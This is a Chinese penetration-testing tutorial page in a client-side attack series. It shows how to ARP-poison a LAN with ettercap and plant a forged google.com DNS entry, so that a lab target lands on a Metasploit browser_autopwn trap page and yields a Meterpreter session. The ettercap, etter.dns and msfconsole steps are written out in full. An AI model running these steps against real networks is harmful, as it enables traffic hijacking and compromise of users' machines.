rel="noopener noreferrer">客户端渗透之——浏览器渗透<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>》和《<a href="https://blog.csdn.net/l1028386804/article/details/86632147" target="_blank" rel="noopener noreferrer">客户端渗透之——对网站的客户进行渗透<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>》中，我们看到了一个传统的browser autopwn攻击以及改进后针对网站用户的攻击。其中，我们受到了一个约束，就是必须要通过某种方式将陷阱链接发送给受害者。在这篇文章中，我们不再向受害者发送任何链接，而是等待他们去浏览自己喜欢的网站。</p> <p>这种攻击只能在局域网环境。因为若想采用这种方式，首先需要执行ARP欺骗。ARP工作在协议层的第二层，只有在同一个广播域下工作。但如果可以通过某种方式来修改远程受害者主机的hosts文件，我们就可以不用考虑这个限制，这通常被称为一个域欺骗攻击。</p> <h2 id="使用dns劫持欺骗受害者"><a href="#使用dns劫持欺骗受害者" class="header-anchor">#</a> 使用DNS劫持欺骗受害者</h2> <p>首先对受害者发起一个ARP毒化攻击，并执行DNS查询欺骗。因此，如果受害者试图打开一个常用的网站主页，例如http://google.com，结果却是打开了我们设置的browser autopwn服务的陷阱主页，进而使得他的系统遭到了来自陷阱网站的攻击。</p> <h2 id="查找etter-dns文件"><a href="#查找etter-dns文件" class="header-anchor">#</a> 查找etter.dns文件</h2> <p>我们需要创建一个DNS毒化列表，通过输入如下命令来找到伪造DNS条目保存的文件。</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">locate</span> etter.dns

root@binghe:~<span class="token comment"># locate etter.dns</span>
/etc/ettercap/etter.dns
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><h2 id="创造伪造dns列表"><a href="#创造伪造dns列表" class="header-anchor">#</a> 创造伪造DNS列表</h2> <p>这里，我们使用的ARP毒化工具为ettercap,首先，找到 etter.dns 文件并创造一个伪造的DNS列表，为了实现这一点，需要修改etter.dns文件中的列表。</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">vim</span> /etc/ettercap/etter.dns
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190124203421488.png" loading="lazy" class="lazy"></p> <p>这里，我们加入了一行google.com A 192.168.175.128，这个假冒的DNS条目指向设置了browser autopwn服务的主机IP。因此，受害者并没有进入自己原计划的网站，而是进入了运行着browser autopwn服务的那个缺陷网站。</p> <p>这样，当受害者发出一个关于域名http://google.com的DNS请求时，这个列表就会把攻击者计算机的IP地址作为响应发送给他。</p> <h2 id="使用ettercap毒化内网"><a href="#使用ettercap毒化内网" class="header-anchor">#</a> 使用ettercap毒化内网</h2> <h2 id="启动ettercap"><a href="#启动ettercap" class="header-anchor">#</a> 启动ettercap</h2> <p>在Kali命令行运行命令：</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>ettercap -G
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>启动ettercap图形界面。</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190124203512151.png" loading="lazy" class="lazy"></p> <h2 id="选择网卡接口"><a href="#选择网卡接口" class="header-anchor">#</a> 选择网卡接口</h2> <p>依次选择ettercap的Sniff-&gt;Unified sniffing...打开选择网卡的弹出框，选择eth0后确定。</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190124203533985.png" loading="lazy" class="lazy"></p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/2019012420354328.png" loading="lazy" class="lazy"></p> <h2 id="扫描目标网络范围"><a href="#扫描目标网络范围" class="header-anchor">#</a> 扫描目标网络范围</h2> <p>对目标网络范围内的主机IP进行扫描，验证哪些主机处于在线状态，</p> <p>依次点击hosts-&gt;Scan for hosts</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190124203606592.png" loading="lazy" class="lazy"></p> <h2 id="查看在线主机"><a href="#查看在线主机" class="header-anchor">#</a> 查看在线主机</h2> <p>依次点击Hosts-&gt;Hosts list</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190124203626802.png" loading="lazy" class="lazy"></p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190124203635935.png" loading="lazy" class="lazy"></p> <p>可以看到我们靶机IP 192.168.175.130也在结果列表中。</p> <h2 id="配置网关和靶机ip"><a href="#配置网关和靶机ip" class="header-anchor">#</a> 配置网关和靶机IP</h2> <p>这里，我们将网关的地址添加到目标2，将靶机IP添加到目标1，以后就将网关看作目标2，将靶机看作目标1。因为我们需要截获靶机发往网关的通信。</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190124203701243.png" loading="lazy" class="lazy"></p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190124203709825.png" loading="lazy" class="lazy"></p> <p>添加后的结果：</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190124203725796.png" loading="lazy" class="lazy"></p> <h2 id="设置arp-poisoning"><a href="#设置arp-poisoning" class="header-anchor">#</a> 设置ARP Poisoning</h2> <p>依次点击Mitm-&gt;ARP poisoning</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/2019012420375615.png" loading="lazy" class="lazy"></p> <p>选中Sniff remote connections后确定。</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190124203820767.png" loading="lazy" class="lazy"></p> <h2 id="执行start-sniffing"><a href="#执行start-sniffing" class="header-anchor">#</a> 执行Start Sniffing</h2> <p>依次点击 Start-&gt;Start sniffing</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/2019012420384134.png" loading="lazy" class="lazy"></p> <p>这时，会输出一个“Unified sniffing already started...”的提示信息</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190124203859182.png" loading="lazy" class="lazy"></p> <h2 id="激活dns欺骗插件程序"><a href="#激活dns欺骗插件程序" class="header-anchor">#</a> 激活DNS欺骗插件程序</h2> <p>依次点击Plugins-&gt;Manage the plugins</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190124203914611.png" loading="lazy" class="lazy"></p> <p>双击dns_spoof以激活DNS欺骗</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190124203930789.png" loading="lazy" class="lazy"></p> <p>双击后的效果为：</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190124203945594.png" loading="lazy" class="lazy"></p> <p>这个插件被激活之后将会发送伪造的DNS数据，这些数据是我们之前在etter.dns中修改过的。因此，无论何时，只要受害者发送某个特定网站域名的DNS请求，攻击就会伪造一个响应，使用etter.dns文件中假冒的DNS条目来代替真实的条目。</p> <h2 id="启动陷阱网站"><a href="#启动陷阱网站" class="header-anchor">#</a> 启动陷阱网站</h2> <p>接下来在80端口启动陷阱网站</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>msfconsole
use auxiliary/server/browser_autopwn
<span class="token builtin class-name">set</span> LHOST <span class="token number">192.168</span>.175.128
<span class="token builtin class-name">set</span> SRVPORT <span class="token number">80</span>
<span class="token builtin class-name">set</span> URIPATH /
exploit
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190124204053680.png" loading="lazy" class="lazy"></p> <h2 id="在靶机上访问链接"><a href="#在靶机上访问链接" class="header-anchor">#</a> 在靶机上访问链接</h2> <p>在靶机上打开链接http://google.com</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190124204120444.png" loading="lazy" class="lazy"></p> <p>这样，我们就可以拿到靶机的Meterpreter。</p> <h2 id="查看靶机的arp信息"><a href="#查看靶机的arp信息" class="header-anchor">#</a> 查看靶机的ARP信息</h2> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190124204141828.png" loading="lazy" class="lazy"></p> <p>可以看到攻击机和网关的Mac地址一样，这是我们对内网进行了ARP毒化的结果。</p> <p><strong>最后，这种方式只能用在局域网，如果想在一个广域网中实现这种攻击，就需要修改受害者的主机文件。这样当受害者试图访问一条执行的URL时，篡改过的主机文件条目将这个URL定向到那个恶意autopwn服务器上。</strong></p> <h2 id="写在最后"><a href="#写在最后" class="header-anchor">#</a> 写在最后</h2> <blockquote><p>如果你觉得冰河写的还不错，请微信搜索并关注「 <strong>冰河技术</strong> 」微信公众号，跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术，「 <strong>冰河技术</strong> 」微信公众号更新了大量技术专题，每一篇技术文章干货满满！不少读者已经通过阅读「 <strong>冰河技术</strong> 」微信公众号文章，吊打面试官，成功跳槽到大厂；也有不少读者实现了技术上的飞跃，成为公司的技术骨干！如果你也想像他们一样提升自己的能力，实现技术能力的飞跃，进大厂，升职加薪，那就关注「 <strong>冰河技术</strong> 」微信公众号吧，每天更新超硬核技术干货，让你对如何提升技术能力不再迷茫！</p></blockquote> <p><img alt="" data-src="https://img-blog.csdnimg.cn/20200906013715889.png" loading="lazy" class="lazy"></p></div> <footer class="page-edit"><div class="edit-link"><a href="https://github.com/binghe001/BingheGuide/edit/master/docs/md/hack/client/2022-05-02-003-与DNS欺骗的结合使用.md" target="_blank" rel="noopener noreferrer">在 GitHub 上编辑此页</a> <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></div> <div class="last-updated"><span class="prefix">上次更新: </span> <span class="time">2022/5/23</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev">
        ←
        <a href="/md/hack/client/2022-05-02-002-对网站的客户进行渗透.html" class="prev">
          对网站的客户进行渗透
        </a></span> <span class="next"><a href="/md/hack/client/2022-05-02-004-基于PDF文件格式的渗透攻击.html">
          基于PDF文件格式的渗透攻击
        </a>
        →
      </span></p></div> </main></div> <aside class="page-sidebar"> <div class="page-side-toolbar"><div class="option-box-toc-fixed"><div class="toc-container-sidebar"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="max-height:650px"><div style="font-weight:bold;text-align:center;">与DNS欺骗的结合使用</div> <hr> <div class="toc-box"><ul class="toc-sidebar-links"><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#使用dns劫持欺骗受害者" class="toc-sidebar-link">使用DNS劫持欺骗受害者</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#查找etter-dns文件" class="toc-sidebar-link">查找etter.dns文件</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#创造伪造dns列表" class="toc-sidebar-link">创造伪造DNS列表</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#使用ettercap毒化内网" class="toc-sidebar-link">使用ettercap毒化内网</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#启动ettercap" class="toc-sidebar-link">启动ettercap</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#选择网卡接口" class="toc-sidebar-link">选择网卡接口</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#扫描目标网络范围" class="toc-sidebar-link">扫描目标网络范围</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#查看在线主机" class="toc-sidebar-link">查看在线主机</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#配置网关和靶机ip" class="toc-sidebar-link">配置网关和靶机IP</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#设置arp-poisoning" class="toc-sidebar-link">设置ARP Poisoning</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#执行start-sniffing" class="toc-sidebar-link">执行Start Sniffing</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#激活dns欺骗插件程序" class="toc-sidebar-link">激活DNS欺骗插件程序</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#启动陷阱网站" class="toc-sidebar-link">启动陷阱网站</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#在靶机上访问链接" class="toc-sidebar-link">在靶机上访问链接</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#查看靶机的arp信息" class="toc-sidebar-link">查看靶机的ARP信息</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#写在最后" class="toc-sidebar-link">写在最后</a><ul class="toc-sidebar-sub-headers"></ul></li></ul></div></div></div></div></div> <div class="option-box-toc-over"><img src="/images/system/toc.png" class="nozoom"> <span class="show-txt">目录</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="max-height:550px"><div style="font-weight:bold;text-align:center;">与DNS欺骗的结合使用</div> <hr> <div class="toc-box"><ul class="toc-sidebar-links"><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#使用dns劫持欺骗受害者" class="toc-sidebar-link">使用DNS劫持欺骗受害者</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#查找etter-dns文件" class="toc-sidebar-link">查找etter.dns文件</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#创造伪造dns列表" class="toc-sidebar-link">创造伪造DNS列表</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#使用ettercap毒化内网" class="toc-sidebar-link">使用ettercap毒化内网</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#启动ettercap" class="toc-sidebar-link">启动ettercap</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#选择网卡接口" class="toc-sidebar-link">选择网卡接口</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#扫描目标网络范围" class="toc-sidebar-link">扫描目标网络范围</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#查看在线主机" class="toc-sidebar-link">查看在线主机</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#配置网关和靶机ip" class="toc-sidebar-link">配置网关和靶机IP</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#设置arp-poisoning" class="toc-sidebar-link">设置ARP Poisoning</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#执行start-sniffing" class="toc-sidebar-link">执行Start Sniffing</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#激活dns欺骗插件程序" class="toc-sidebar-link">激活DNS欺骗插件程序</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#启动陷阱网站" class="toc-sidebar-link">启动陷阱网站</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#在靶机上访问链接" class="toc-sidebar-link">在靶机上访问链接</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#查看靶机的arp信息" class="toc-sidebar-link">查看靶机的ARP信息</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html#写在最后" class="toc-sidebar-link">写在最后</a><ul class="toc-sidebar-sub-headers"></ul></li></ul></div></div></div></div></div> <div class="option-box"><img src="/images/system/wechat.png" class="nozoom"> <span class="show-txt">手机看</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.9rem">微信扫一扫</span> <img height="180px" src="https://api.qrserver.com/v1/create-qr-code/?data=https://binghe001.github.io/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html" style="margin:10px;">
                可以<b>手机看</b>或分享至<b>朋友圈</b></div></div></div></div> <div class="option-box"><img src="/images/system/toggle.png" width="30px" class="nozoom"> <span class="show-txt">左栏</span></div> <div class="option-box"><img src="/images/system/xingqiu.png" width="25px" class="nozoom"> <span class="show-txt">星球</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.8rem;font-weight:bold;">实战项目<span style="font-size:8px;color:red;">「SpringCloud Alibaba实战项目」</span>、专属电子书、问题解答、简历指导、技术分享、晋升指导、视频课程</span> <img height="180px" src="/images/personal/xingqiu.png" style="margin:10px;"> <b>知识星球</b>：冰河技术
            </div></div></div></div> <div class="option-box"><img src="/images/system/wexin4.png" width="25px" class="nozoom"> <span class="show-txt">读者群</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.8rem;font-weight:bold;">添加冰河微信<span style="color:red;">(hacker_binghe)</span>进冰河技术学习交流圈「无任何套路」</span> <img src="/images/personal/hacker_binghe.jpg" height="180px" style="margin:10px;">
                PS：添加时请备注<b>读者加群</b>，谢谢！
              </div></div></div></div> <div class="option-box"><img src="/images/system/download-2.png" width="25px" class="nozoom"> <span class="show-txt">下资料</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.8rem;font-weight:bold;">扫描公众号，回复<span style="color:red;">“1024”</span>下载<span style="color:red;">100GB+</span>学习技术资料、PDF书籍、实战项目、简历模板等「无任何套路」</span> <img src="/images/personal/qrcode.png" height="180px" style="margin:10px;"> <b>公众号:</b> 冰河技术
              </div></div></div></div> <div class="option-box"><img src="/images/system/heart-1.png" width="25px" class="nozoom"> <span class="show-txt">赞赏我</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.8rem;font-weight:bold;">鼓励/支持/赞赏我</span> <img height="180px" src="/images/personal/encourage-head.png" style="margin:5px;"> <br>1. 不靠它生存但仍希望得到你的鼓励；
                <br>2. 时刻警醒自己保持技术人的初心；
              </div></div></div></div> <div title="对网站的客户进行渗透" class="option-box" style="padding-left:2px;text-align:center;"><a href="/md/hack/client/2022-05-02-002-对网站的客户进行渗透.html"><img src="/images/system/pre2.png" width="30px" class="nozoom"> <span class="show-txt">上一篇</span></a></div> <div title="基于PDF文件格式的渗透攻击" class="option-box" style="padding-left:2px;text-align:center;"><a href="/md/hack/client/2022-05-02-004-基于PDF文件格式的渗透攻击.html"><img src="/images/system/next2.png" width="30px" class="nozoom"> <span class="show-txt">下一篇</span></a></div></div>  <!----> </aside></div><div class="global-ui"><div class="read-more-wrap" style="display:none;position:absolute;bottom:0px;z-index:9999;width:100%;margin-top:-100px;font-family:PingFangSC-Regular, sans-serif;"><div id="read-more-mask" style="position: relative; height: 200px; background: -webkit-gradient(linear, 0 0%, 0 100%, from(rgba(255, 255, 255, 0)), to(rgb(255, 255, 255)));"></div> <a id="read-more-btn" target="_self" style="position: absolute; left: 50%; top: 70%; bottom: 30px; transform: translate(-50%, -50%); width: 160px; height: 36px; line-height: 36px; font-size: 15px; text-align: center; border: 1px solid rgb(222, 104, 109); color: rgb(222, 104, 109); background: rgb(255, 255, 255); cursor: pointer; border-radius: 6px;">阅读全文</a> <div id="btw-modal-wrap" style="display: none;"><div id="btw-mask" style="position: fixed; top: 0px; right: 0px; bottom: 0px; left: 0px; opacity: 0.7; z-index: 999; background: rgb(0, 0, 0);"></div> <div id="btw-modal" style="position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 300px; text-align: center; font-size: 13px; background: rgb(255, 255, 255); border-radius: 10px; z-index: 9999; font-family: PingFangSC-Regular, sans-serif;"><span id="btw-modal-close-btn" style="position: absolute; top: 5px; right: 15px; line-height: 34px; font-size: 34px; cursor: pointer; opacity: 0.2; z-index: 9999; color: rgb(0, 0, 0); background: none; border: none; outline: none;">×</span> <p id="btw-modal-header" style="margin-top: 40px; line-height: 1.8; font-size: 13px;">
                扫码或搜索：<span style="color: #E9405A; font-weight: bold;">冰河技术</span> <br>发送：<span id="fustack-token" class="token" style="color: #e9415a; font-weight: bold; font-size: 17px; margin-bottom: 45px;">290992</span> <br>即可<span style="color: #e9415a; font-weight: bold;">立即永久</span>解锁本站全部文章</p> <img src="/images/personal/qrcode.png" style="width: 180px; margin-top: 10px; margin-bottom: 30px; border: 8px solid rgb(230, 230, 230);"></div></div></div><div class="pay-read-more-wrap" style="display:none;position:absolute;bottom:0px;z-index:9999;width:100%;margin-top:-100px;font-family:PingFangSC-Regular, sans-serif;"><div id="pay-read-more-mask" style="position: relative; height: 200px; background: -webkit-gradient(linear, 0 0%, 0 100%, from(rgba(255, 255, 255, 0)), to(rgb(255, 255, 255)));"></div> <a id="pay-read-more-btn" target="_blank" style="position: absolute; left: 50%; top: 70%; bottom: 30px; transform: translate(-50%, -50%); width: 160px; height: 36px; line-height: 36px; font-size: 15px; text-align: center; border: 1px solid rgb(222, 104, 109); color: rgb(222, 104, 109); background: rgb(255, 255, 255); cursor: pointer; border-radius: 6px;">付费阅读</a></div></div></div>
    <script src="/assets/js/cg-styles.js?v=1653305936337" defer></script><script src="/assets/js/cg-4.js?v=1653305936337" defer></script><script src="/assets/js/cg-3.js?v=1653305936337" defer></script><script src="/assets/js/cg-138.js?v=1653305936337" defer></script><script src="/assets/js/cg-5.js?v=1653305936337" defer></script><script src="/assets/js/cg-6.js?v=1653305936337" defer></script><script src="/assets/js/cg-app.js?v=1653305936337" defer></script>
  </body>
</html>
